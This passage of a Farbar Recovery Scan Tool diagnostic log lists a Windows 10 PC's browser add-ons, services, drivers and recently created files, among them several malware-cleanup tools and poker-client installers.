    HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL =
    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL =
    HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL =
    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL =
    BHO: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> D:\Microsoft Office 2013\Office15\OCHelper.dll [2016-01-12] (Microsoft Corporation)
    BHO: avast! Online Security -> {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} -> C:\Program Files\AVAST Software\Avast\aswWebRepIE64.dll [2015-07-02] (Avast Software s.r.o.)
    BHO: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll [2016-01-08] (Microsoft Corporation)
    BHO: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> D:\Microsoft Office 2013\Office15\GROOVEEX.DLL [2016-01-12] (Microsoft Corporation)
    BHO-x32: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\Office15\OCHelper.dll [2016-01-12] (Microsoft Corporation)
    BHO-x32: PlusIEEventHelper Class -> {551A852F-39A6-44A7-9C13-AFBEC9185A9D} -> C:\Program Files (x86)\Nuance\PDF Viewer Plus\Bin\PlusIEContextMenu.dll [2009-02-06] (Zeon Corporation)
    BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_74\bin\ssv.dll [2016-02-25] (Oracle Corporation)
    BHO-x32: avast! Online Security -> {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} -> C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll [2015-07-02] (Avast Software s.r.o.)
    BHO-x32: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll [2016-01-08] (Microsoft Corporation)
    BHO-x32: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\Office15\GROOVEEX.DLL [2016-01-12] (Microsoft Corporation)
    BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_74\bin\jp2ssv.dll [2016-02-25] (Oracle Corporation)
    Handler: osf - {D924BDC6-C83A-4BD5-90D0-095128A113D1} - D:\Microsoft Office 2013\Office15\MSOSB.DLL [2015-02-17] (Microsoft Corporation)
    Handler-x32: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll [2014-05-02] (Skype Technologies)
    Handler: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll [2016-01-08] (Microsoft Corporation)
    Handler-x32: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll [2016-01-08] (Microsoft Corporation)

    FireFox:
    ========
    FF Plugin: @microsoft.com/SharePoint,version=14.0 -> D:\MICROS~1\Office15\NPSPWRAP.DLL [2014-01-23] (Microsoft Corporation)
    FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect64.dll [2014-04-28] (Adobe Systems)
    FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll [2014-10-30] ()
    FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.5 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll [No File]
    FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll [No File]
    FF Plugin-x32: @java.com/DTPlugin,version=11.74.2 -> C:\Program Files (x86)\Java\jre1.8.0_74\bin\dtplugin\npDeployJava1.dll [2016-02-25] (Oracle Corporation)
    FF Plugin-x32: @java.com/JavaPlugin,version=11.74.2 -> C:\Program Files (x86)\Java\jre1.8.0_74\bin\plugin2\npjp2.dll [2016-02-25] (Oracle Corporation)
    FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files (x86)\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2015-11-18] (Microsoft Corporation)
    FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~1\Office15\NPSPWRAP.DLL [2014-01-22] (Microsoft Corporation)
    FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-02-02] (Google Inc.)
    FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-02-02] (Google Inc.)
    FF Plugin-x32: @videolan.org/vlc,version=2.1.3 -> D:\VLC\npvlc.dll [2015-04-13] (VideoLAN)
    FF Plugin-x32: @videolan.org/vlc,version=2.2.1 -> D:\VLC\npvlc.dll [2015-04-13] (VideoLAN)
    FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2015-12-19] (Adobe Systems Inc.)
    FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect32.dll [2014-04-28] (Adobe Systems)
    FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npMeetingJoinPluginOC.dll [2015-11-18] (Microsoft Corporation)
    FF HKLM-x32\...\Firefox\Extensions: [wrc@avast.com] - C:\Program Files\AVAST Software\Avast\WebRep\FF
    FF Extension: Avast Online Security - C:\Program Files\AVAST Software\Avast\WebRep\FF [2015-12-10]

    Chrome:
    =======
    CHR HomePage: Default -> hxxp://www.google.com/
    CHR StartupUrls: Default -> "hxxp://www.youtube.com/feed/subscriptions","hxxp://imgur.com/","hxxps://www.netflix.com/","hxxp://twitch.tv/"
    CHR Plugin: (Shockwave Flash) - C:\Program Files (x86)\Google\Chrome\Application\48.0.2564.116\PepperFlash\pepflashplayer.dll ()
    CHR Plugin: (Native Client) - C:\Program Files (x86)\Google\Chrome\Application\48.0.2564.116\ppGoogleNaClPluginChrome.dll => No File
    CHR Plugin: (Chrome PDF Viewer) - C:\Program Files (x86)\Google\Chrome\Application\48.0.2564.116\pdf.dll => No File
    CHR Plugin: (Google Update) - C:\Program Files (x86)\Google\Update\1.3.21.115\npGoogleUpdate3.dll => No File
    CHR Plugin: (Intel® Identity Protection Technology) - C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll => No File
    CHR Plugin: (Intel® Identity Protection Technology) - C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll => No File
    CHR Plugin: (Java(TM) Platform SE 7 U55) - C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll => No File
    CHR Profile: C:\Users\Kym\AppData\Local\Google\Chrome\User Data\Default
    CHR Extension: (YouTube) - C:\Users\Kym\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-09-24]
    CHR Extension: (Adblock Plus) - C:\Users\Kym\AppData\Local\Google\Chrome\User Data\Default\Extensions\cfhdojbkjhnklbpkdaibdccddilifddb [2016-02-26]
    CHR Extension: (Google Search) - C:\Users\Kym\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-10-27]
    CHR Extension: (Chrome Web Store Payments) - C:\Users\Kym\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2015-07-26]
    CHR Extension: (Gmail) - C:\Users\Kym\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-03-28]
    CHR HKLM-x32\...\Chrome\Extension: [gomekmidlodglbbmalcneegieacbdmki] - C:\Program Files\AVAST Software\Avast\WebRep\Chrome\aswWebRepChrome.crx [2015-07-02]
    CHR HKLM-x32\...\Chrome\Extension: [lifbcibllhkdhoafpjfnlhfpfgnpldfl] - C:\Program Files (x86)\Skype\Toolbars\ChromeExtension\skype_chrome_extension.crx [2016-01-08]

    ==================== Services (Whitelisted) ========================

    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

    R2 AdobeActiveFileMonitor11.0; D:\Program Files\Adobe\Adobe Premiere Elements 2011\Elements 11 Organizer\PhotoshopElementsFileAgent.exe [171600 2012-09-17] (Adobe Systems Incorporated)
    R2 AGSService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe [2020056 2016-02-09] (Adobe Systems, Incorporated)
    R2 Apple Mobile Device Service; C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [77104 2015-09-02] (Apple Inc.)
    S3 AppleChargerSrv; C:\Windows\System32\AppleChargerSrv.exe [31272 2010-04-07] ()
    R2 avast! Antivirus; C:\Program Files\AVAST Software\Avast\AvastSvc.exe [343336 2015-07-02] (Avast Software s.r.o.)
    R3 AvastVBoxSvc; C:\Program Files\AVAST Software\Avast\ng\vbox\AvastVBoxSVC.exe [4034896 2015-07-02] (Avast Software)
    S3 BEService; C:\Program Files (x86)\Common Files\BattlEye\BEService.exe [49152 2014-05-04] () [File not signed]
    R3 BrYNSvc; C:\Program Files (x86)\Browny02\BrYNSvc.exe [266240 2012-06-05] (Brother Industries, Ltd.) [File not signed]
    R2 c2cautoupdatesvc; C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe [1433216 2016-01-08] (Microsoft Corporation)
    R2 c2cpnrsvc; C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe [1773696 2016-01-08] (Microsoft Corporation)
    R2 IAStorDataMgrSvc; C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe [15720 2013-08-07] (Intel Corporation)
    R2 igfxCUIService2.0.0.0; C:\Windows\system32\igfxCUIService.exe [351120 2015-07-18] (Intel Corporation)
    R2 Intel(R) Capability Licensing Service Interface; C:\Program Files\Intel\iCLS Client\HeciServer.exe [747520 2013-08-27] (Intel(R) Corporation) [File not signed]
    S3 Intel(R) Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [828376 2013-08-27] (Intel(R) Corporation)
    S2 MBAMService; D:\Malwarebytes Anti-Malware\mbamservice.exe [1135416 2015-10-05] (Malwarebytes)
    S3 PAExec; C:\Windows\PAExec.exe [190464 2014-10-18] (Power Admin LLC) [File not signed]
    R2 PDFProFiltSrvPP; C:\Program Files (x86)\Nuance\PaperPort\PDFProFiltSrvPP.exe [145256 2011-08-02] (Nuance Communications, Inc.)
    R2 Razer Chroma SDK Service; C:\Program Files (x86)\Razer Chroma SDK\bin\RzSDKService.exe [54272 2015-12-18] (Razer Inc.) [File not signed]
    R2 Razer Game Scanner Service; C:\Program Files (x86)\Razer\Razer Services\GSS\GameScannerService.exe [188072 2015-11-05] ()
    R2 SDScannerService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe [1750712 2015-06-16] (Safer-Networking Ltd.)
    R2 SDUpdateService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe [2102496 2015-06-16] (Safer-Networking Ltd.)
    R2 SDWSCService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe [224712 2015-07-24] (Safer-Networking Ltd.)
    S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [362928 2015-07-10] (Microsoft Corporation)
    S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [24864 2015-07-10] (Microsoft Corporation)
    S2 Hamachi2Svc; D:\LogMeIn\hamachi-2.exe -s [X]
    S2 jhi_service; "C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe" [X]
    S2 LMS; "C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe" [X]

    ===================== Drivers (Whitelisted) ==========================

    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

    S0 amdkmafd; C:\Windows\System32\drivers\amdkmafd.sys [40720 2015-07-29] (Advanced Micro Devices, Inc.)
    R1 AppleCharger; C:\Windows\System32\DRIVERS\AppleCharger.sys [22240 2013-10-28] ()
    R2 aswHwid; C:\Windows\system32\drivers\aswHwid.sys [29168 2015-07-02] ()
    R2 aswMonFlt; C:\Windows\system32\drivers\aswMonFlt.sys [89944 2015-07-02] (Avast Software s.r.o.)
    R1 aswRdr; C:\Windows\system32\drivers\aswRdr2.sys [93528 2015-07-02] (Avast Software s.r.o.)
    R0 aswRvrt; C:\Windows\System32\Drivers\aswRvrt.sys [65736 2015-07-02] ()
    S1 aswSnx; C:\Windows\system32\drivers\aswSnx.sys [1047320 2015-07-02] (Avast Software s.r.o.)
    R1 aswSP; C:\Windows\system32\drivers\aswSP.sys [442264 2015-07-02] (Avast Software s.r.o.)
    R2 aswStm; C:\Windows\system32\drivers\aswStm.sys [137288 2015-07-02] (Avast Software s.r.o.)
    R0 aswVmm; C:\Windows\System32\Drivers\aswVmm.sys [272248 2015-07-02] ()
    R3 AtiHDAudioService; C:\Windows\system32\drivers\AtihdWT6.sys [102912 2015-09-18] (Advanced Micro Devices)
    S3 Hamachi; C:\Windows\system32\DRIVERS\Hamdrv.sys [45680 2015-11-12] (LogMeIn Inc.)
    S3 LADF_DHP2; C:\Windows\system32\DRIVERS\ladfDHP2amd64.sys [62168 2010-09-29] (Logitech)
    S3 LADF_SBVM; C:\Windows\system32\DRIVERS\ladfSBVMamd64.sys [377176 2010-09-29] (Logitech)
    R2 LGCoreTemp; C:\Program Files\Logitech Gaming Software\Drivers\LgCoreTemp\lgcoretemp.sys [14184 2015-06-22] (Logitech)
    R3 LGJoyXlCore; C:\Windows\system32\drivers\LGJoyXlCore.sys [68384 2015-06-11] (Logitech Inc.)
    R3 MBAMProtector; C:\WINDOWS\system32\drivers\mbam.sys [25816 2015-10-05] (Malwarebytes)
    S3 MBAMWebAccessControl; C:\WINDOWS\system32\drivers\mwac.sys [64216 2015-10-05] (Malwarebytes Corporation)
    R3 MEIx64; C:\Windows\system32\DRIVERS\TeeDriverx64.sys [99288 2013-09-16] (Intel Corporation)
    R0 PxHlpa64; C:\Windows\System32\Drivers\PxHlpa64.sys [56336 2012-08-10] (Corel Corporation)
    R3 rt640x64; C:\Windows\System32\drivers\rt640x64.sys [895256 2015-06-23] (Realtek )
    S3 rzdaendpt; C:\Windows\System32\drivers\rzdaendpt.sys [43720 2015-08-14] (Razer Inc)
    S3 rzendpt; C:\Windows\System32\drivers\rzendpt.sys [50392 2015-08-14] (Razer Inc)
    R3 rzmpos; C:\Windows\System32\drivers\rzmpos.sys [48840 2015-08-14] (Razer Inc)
    R2 rzpmgrk; C:\WINDOWS\system32\drivers\rzpmgrk.sys [37184 2015-09-23] (Razer, Inc.)
    R2 rzpnk; C:\WINDOWS\system32\drivers\rzpnk.sys [130880 2015-12-15] (Razer, Inc.)
    S3 rzvkeyboard; C:\Windows\System32\drivers\rzvkeyboard.sys [44232 2015-08-14] (Razer Inc)
    S3 UdeCx; C:\Windows\System32\drivers\udecx.sys [44032 2015-07-10] ()
    R2 VBoxAswDrv; C:\Program Files\AVAST Software\Avast\ng\vbox\VBoxAswDrv.sys [273824 2015-07-02] (Avast Software)
    S3 WdBoot; C:\Windows\system32\drivers\WdBoot.sys [44568 2015-07-10] (Microsoft Corporation)
    S3 WdFilter; C:\Windows\system32\drivers\WdFilter.sys [291680 2015-07-10] (Microsoft Corporation)
    S3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [119648 2015-07-10] (Microsoft Corporation)
    R3 XtuAcpiDriver; C:\Windows\System32\drivers\XtuAcpiDriver.sys [63840 2015-06-06] (Intel Corporation)
    U3 idsvc; no ImagePath
    S3 wfpcapture; \SystemRoot\System32\drivers\wfpcapture.sys [X]
    U3 wpcsvc; no ImagePath

    ==================== NetSvcs (Whitelisted) ===================

    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


    ==================== One Month Created files and folders ========

    (If an entry is included in the fixlist, the file/folder will be moved.)

    2016-03-01 21:57 - 2016-03-01 22:10 - 00000000 ____D C:\ProgramData\Malwarebytes' Anti-Malware (portable)
    2016-03-01 21:55 - 2016-03-01 21:55 - 00000000 ____D C:\Users\Kym\Downloads\mbar-1.09.3.1001
    2016-03-01 21:53 - 2016-03-01 21:55 - 00000000 ____D C:\Users\Kym\Desktop\mbar-1.09.3.1001
    2016-03-01 21:52 - 2016-03-01 21:54 - 16563352 _____ (Malwarebytes Corp.) C:\Users\Kym\Downloads\mbar-1.09.3.1001.exe
    2016-03-01 21:48 - 2016-03-01 21:48 - 00016148 _____ C:\WINDOWS\system32\KYM-PC_Kym_HistoryPrediction.bin
    2016-03-01 12:40 - 2016-03-01 21:57 - 00192216 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MBAMSwissArmy.sys
    2016-03-01 12:40 - 2016-03-01 21:56 - 00109272 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbamchameleon.sys
    2016-03-01 12:40 - 2016-03-01 12:40 - 00000692 _____ C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
    2016-03-01 12:40 - 2016-03-01 12:40 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
    2016-03-01 12:40 - 2016-03-01 12:40 - 00000000 ____D C:\ProgramData\Malwarebytes
    2016-03-01 12:40 - 2015-10-05 09:50 - 00064216 _____ (Malwarebytes Corporation) C:\WINDOWS\system32\Drivers\mwac.sys
    2016-03-01 12:40 - 2015-10-05 09:50 - 00025816 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbam.sys
    2016-03-01 12:39 - 2016-03-01 12:39 - 00000159 _____ C:\Users\Kym\Desktop\ckfiles.txt
    2016-03-01 12:36 - 2016-03-01 12:36 - 00001001 _____ C:\Users\Kym\Desktop\JRT.txt
    2016-03-01 12:33 - 2016-03-01 12:33 - 00005519 _____ C:\Users\Kym\Desktop\AdwCleaner[C1].txt
    2016-03-01 12:27 - 2016-03-01 12:31 - 00000000 ____D C:\AdwCleaner
    2016-03-01 12:24 - 2016-03-01 12:39 - 22908888 _____ (Malwarebytes ) C:\Users\Kym\Desktop\mbam-setup-2-2-0-1024.exe
    2016-03-01 12:24 - 2016-03-01 12:38 - 00468480 _____ () C:\Users\Kym\Desktop\CKScanner.exe
    2016-03-01 12:23 - 2016-03-01 12:34 - 01609216 _____ (Malwarebytes) C:\Users\Kym\Desktop\JRT.exe
    2016-03-01 12:21 - 2016-03-01 12:27 - 01518592 _____ C:\Users\Kym\Desktop\AdwCleaner.exe
    2016-03-01 12:19 - 2016-03-01 12:20 - 00016163 _____ C:\Users\Kym\Desktop\Fixlog.txt
    2016-02-29 20:50 - 2016-02-29 20:50 - 00002245 _____ C:\Users\Kym\Desktop\aswMBR.txt
    2016-02-29 20:50 - 2016-02-29 20:50 - 00000512 _____ C:\Users\Kym\Desktop\MBR.dat
    2016-02-29 20:46 - 2016-03-01 22:11 - 00026829 _____ C:\Users\Kym\Desktop\FRST.txt
    2016-02-29 20:46 - 2016-02-29 20:47 - 00072356 _____ C:\Users\Kym\Desktop\Addition.txt
    2016-02-29 20:43 - 2016-03-01 22:11 - 00000000 ____D C:\FRST
    2016-02-29 20:39 - 2016-02-29 20:39 - 00002342 _____ C:\Users\Public\Desktop\Tweaking.com - Registry Backup.lnk
    2016-02-29 20:39 - 2016-02-29 20:39 - 00000207 _____ C:\WINDOWS\tweaking.com-regbackup-KYM-PC-Windows-10-Home-(64-bit).dat
    2016-02-29 20:39 - 2016-02-29 20:39 - 00000000 ____D C:\RegBackup
    2016-02-29 20:39 - 2016-02-29 20:39 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Tweaking.com
    2016-02-29 20:39 - 2016-02-29 20:39 - 00000000 ____D C:\Program Files (x86)\Tweaking.com
    2016-02-29 20:38 - 2016-02-29 20:47 - 05198336 _____ (AVAST Software) C:\Users\Kym\Desktop\aswMBR.exe
    2016-02-29 20:38 - 2016-02-29 20:39 - 00016377 _____ C:\WINDOWS\Tweaking.com - Registry Backup Setup Log.txt
    2016-02-29 20:36 - 2016-02-29 20:43 - 02371072 _____ (Farbar) C:\Users\Kym\Desktop\FRST64.exe
    2016-02-29 20:35 - 2016-02-29 20:38 - 04777232 _____ (Tweaking.com) C:\Users\Kym\Downloads\tweaking.com_registry_backup_setup.exe
    2016-02-29 19:37 - 2016-02-29 20:31 - 00000214 _____ C:\WINDOWS\Tasks\CreateExplorerShellUnelevatedTask.job
    2016-02-29 19:34 - 2016-02-29 19:34 - 00000000 ____D C:\WINDOWS\pss
    2016-02-28 21:02 - 2016-01-08 22:44 - 00000822 _____ C:\WINDOWS\system32\Drivers\etc\hosts.20160228-210203.backup
    2016-02-28 18:59 - 2016-02-28 18:59 - 00000000 ____D C:\Program Files\Common Files\AV
    2016-02-28 18:50 - 2016-02-28 21:01 - 00000000 ____D C:\ProgramData\Spybot - Search & Destroy
    2016-02-28 18:50 - 2016-02-28 20:23 - 00001494 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spybot-S&D Start Center.lnk
    2016-02-28 18:50 - 2016-02-28 20:23 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spybot - Search & Destroy 2
    2016-02-28 18:50 - 2016-02-28 20:23 - 00000000 ____D C:\Program Files (x86)\Spybot - Search & Destroy 2
    2016-02-28 18:50 - 2016-02-28 18:50 - 00000000 ____D C:\WINDOWS\System32\Tasks\Safer-Networking
    2016-02-28 18:50 - 2015-06-16 17:32 - 00020760 _____ (Safer-Networking Ltd.) C:\WINDOWS\system32\sdnclean64.exe
    2016-02-28 18:04 - 2016-02-28 18:48 - 46525608 _____ (Safer-Networking Ltd. ) C:\Users\Kym\Downloads\spybot-2.4.exe
    2016-02-26 06:50 - 2016-02-26 06:50 - 00002378 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
    2016-02-26 00:30 - 2016-02-26 06:49 - 00000000 ____D C:\Users\Kym\AppData\Local\Deployment
    2016-02-26 00:30 - 2016-02-26 00:30 - 00000000 ____D C:\Users\Kym\AppData\Local\Apps\2.0
    2016-02-25 23:16 - 2016-02-25 23:16 - 00000000 ____D C:\Users\Kym\AppData\Roaming\Sun
    2016-02-25 23:16 - 2016-02-25 23:16 - 00000000 ____D C:\Users\Kym\AppData\LocalLow\Oracle
    2016-02-25 23:16 - 2016-02-25 23:16 - 00000000 ____D C:\Users\Kym\.oracle_jre_usage
    2016-02-18 15:04 - 2016-02-18 17:51 - 00000000 ____D C:\Users\Kym\Documents\Kalyani
    2016-02-15 19:06 - 2016-02-15 19:06 - 00223232 _____ C:\Users\Kym\Downloads\Archibald Prize 2015 information.pdf
    2016-02-15 13:32 - 2016-02-15 13:32 - 00281328 _____ C:\WINDOWS\Minidump\021516-19125-01.dmp
    2016-02-13 19:16 - 2016-02-13 19:19 - 00000000 ____D C:\Users\Kym\AppData\Local\FullTiltPoker
    2016-02-13 19:06 - 2016-02-13 19:06 - 00000000 ____D C:\Users\Kym\AppData\Roaming\Party
    2016-02-13 19:06 - 2016-02-13 19:06 - 00000000 ____D C:\Users\Kym\AppData\Roaming\cef-cache
    2016-02-13 19:00 - 2016-02-13 19:00 - 00000683 _____ C:\Users\Public\Desktop\Full Tilt Poker.lnk
    2016-02-13 19:00 - 2016-02-13 19:00 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Full Tilt Poker
    2016-02-13 18:11 - 2016-02-13 19:00 - 00877888 _____ C:\Users\Kym\Downloads\PartyPokerSetup.exe
    2016-02-13 18:10 - 2016-02-13 18:59 - 73087280 _____ C:\Users\Kym\Downloads\FullTiltSetup.exe
    2016-02-13 18:10 - 2016-02-13 18:10 - 00877888 _____ C:\Users\Kym\Downloads\Unconfirmed 937642.crdownload
    2016-02-10 23:28 - 2016-01-31 16:25 - 01951872 _____ (Microsoft Corporation) C:\WINDOWS\system32\KernelBase.dll
    2016-02-10 23:28 - 2016-01-31 16:23 - 02601160 _____ (Microsoft Corporation) C:\WINDOWS\system32\combase.dll
    2016-02-10 23:28 - 2016-01-31 16:23 - 01420392 _____ (Microsoft Corporation) C:\WINDOWS\system32\msctf.dll
    2016-02-10 23:28 - 2016-01-31 16:06 - 01531368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\KernelBase.dll
    2016-02-10 23:28 - 2016-01-31 16:04 - 01811360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\combase.dll
    2016-02-10 23:28 - 2016-01-31 16:04 - 01180696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msctf.dll
    2016-02-10 23:28 - 2016-01-31 15:38 - 21873152 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgehtml.dll
    2016-02-10 23:28 - 2016-01-31 15:33 - 24593920 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
    2016-02-10 23:28 - 2016-01-31 15:29 - 11557888 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.dll
    2016-02-10 23:28 - 2016-01-31 15:26 - 06787072 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Data.Pdf.dll
    2016-02-10 23:28 - 2016-01-31 15:26 - 03793408 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpcorets.dll
    2016-02-10 23:28 - 2016-01-31 15:25 - 12504576 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll
    2016-02-10 23:28 - 2016-01-31 15:17 - 00109056 _____ (Microsoft Corporation) C:\WINDOWS\system32\hlink.dll
    2016-02-10 23:28 - 2016-01-31 15:16 - 09889280 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinui.dll
    2016-02-10 23:28 - 2016-01-31 15:13 - 04791808 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll
    2016-02-10 23:28 - 2016-01-31 15:11 - 05156352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Data.Pdf.dll
    2016-02-10 23:28 - 2016-01-31 15:04 - 00100352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\hlink.dll
    2016-02-10 23:28 - 2016-01-31 15:00 - 11263488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll
    2016-02-10 23:27 - 2016-01-31 16:25 - 01248896 _____ (Microsoft Corporation) C:\WINDOWS\system32\WinTypes.dll
    2016-02-10 23:27 - 2016-01-31 16:24 - 01824880 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntdll.dll
    2016-02-10 23:27 - 2016-01-31 16:06 - 01535032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ntdll.dll
    2016-02-10 23:27 - 2016-01-31 16:06 - 00809336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WinTypes.dll
    2016-02-10 23:27 - 2016-01-31 15:34 - 00088064 _____ (Microsoft Corporation) C:\WINDOWS\system32\ngckeyenum.dll
    2016-02-10 23:27 - 2016-01-31 15:33 - 00057856 _____ (Microsoft Corporation) C:\WINDOWS\system32\IoTAssignedAccessLockFramework.dll
    2016-02-10 23:27 - 2016-01-31 15:29 - 00141312 _____ (Microsoft Corporation) C:\WINDOWS\system32\rasman.dll
    2016-02-10 23:27 - 2016-01-31 15:25 - 02237952 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaueng.dll
    2016-02-10 23:27 - 2016-01-31 15:25 - 00366592 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuuhext.dll
    2016-02-10 23:27 - 2016-01-31 15:25 - 00143872 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxdav.sys
    2016-02-10 23:27 - 2016-01-31 15:24 - 00784384 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuapi.dll
    2016-02-10 23:27 - 2016-01-31 15:24 - 00047616 _____ (Microsoft Corporation) C:\WINDOWS\system32\wups.dll
    2016-02-10 23:27 - 2016-01-31 15:24 - 00033280 _____ (Microsoft Corporation) C:\WINDOWS\system32\wups2.dll
    2016-02-10 23:27 - 2016-01-31 15:23 - 00079360 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpudd.dll
    2016-02-10 23:27 - 2016-01-31 15:22 - 00680448 _____ (Microsoft Corporation) C:\WINDOWS\system32\rasmans.dll
    2016-02-10 23:27 - 2016-01-31 15:20 - 02849792 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininet.dll
    2016-02-10 23:27 - 2016-01-31 15:19 - 01602560 _____ (Microsoft Corporation) C:\WINDOWS\system32\urlmon.dll
